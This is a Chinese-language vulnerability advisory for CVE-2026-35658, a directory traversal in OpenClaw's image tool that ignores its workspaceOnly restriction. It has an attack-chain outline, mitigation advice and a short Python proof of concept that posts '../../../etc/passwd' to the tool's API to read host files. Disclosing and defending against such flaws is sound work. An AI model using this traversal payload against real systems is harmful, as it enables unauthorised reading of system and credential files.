CVE-2026-35658 CVSS 6.5 中危

CVE-2026-35658 OpenClaw文件系统边界绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35658

漏洞类型

目录遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.2版本之前的镜像工具中存在文件系统边界绕过漏洞。由于未正确遵守`tools.fs.workspaceOnly`限制，攻击者可通过遍历沙箱桥接挂载点，绕过工作区限制读取敏感文件。该漏洞需低权限且无需用户交互，利用难度较低，主要威胁数据机密性。

技术细节

该漏洞的根源在于OpenClaw的图像工具未能严格执行文件系统安全策略。虽然系统设置了`tools.fs.workspaceOnly`以限制文件操作范围，但该工具未对用户输入的路径进行充分的边界检查和规范化处理。攻击者利用低权限账户访问系统后，可构造包含“../”或绝对路径的特制请求发送给图像工具。由于系统未能拦截此类跳转，请求成功穿透了沙箱工作区，访问到了宿主机或其他被挂载的文件系统区域。这使得攻击者能够读取其他文件系统工具通常会拒绝的敏感数据，造成信息泄露，但不会直接影响系统的完整性或可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是OpenClaw 2026.3.2之前的版本。

STEP 2

获取访问权限

攻击者获取一个低权限用户账号（PR:L），无需特殊用户交互。

STEP 3

漏洞利用

攻击者向图像工具发送特制的API请求，在文件路径参数中插入“../”序列以遍历目录。

STEP 4

绕过限制

由于工具未强制执行workspaceOnly限制，请求成功绕过沙箱边界。

STEP 5

数据窃取

攻击者读取工作区之外的敏感文件（如系统配置文件、密钥等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2026-35658
# Demonstrates bypassing tools.fs.workspaceOnly

target_url = "http://vulnerable-host:port/api/image-tool"

# Attacker needs a low-privilege session cookie or token
headers = {
    "Authorization": "Bearer LOW_PRIVILEGE_TOKEN",
    "Content-Type": "application/json"
}

# Payload using path traversal to read files outside workspace
# Attempting to read /etc/passwd from the host/container
payload = {
    "file": "../../../etc/passwd",
    "action": "process"
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Request successful. Check response for file content.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

OpenClaw < 2026.3.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用受影响的图像工具功能，或通过WAF/IPS规则拦截包含路径遍历字符（如“../”）的API请求。同时，应加强对文件访问日志的审计，以便及时发现异常的读取行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表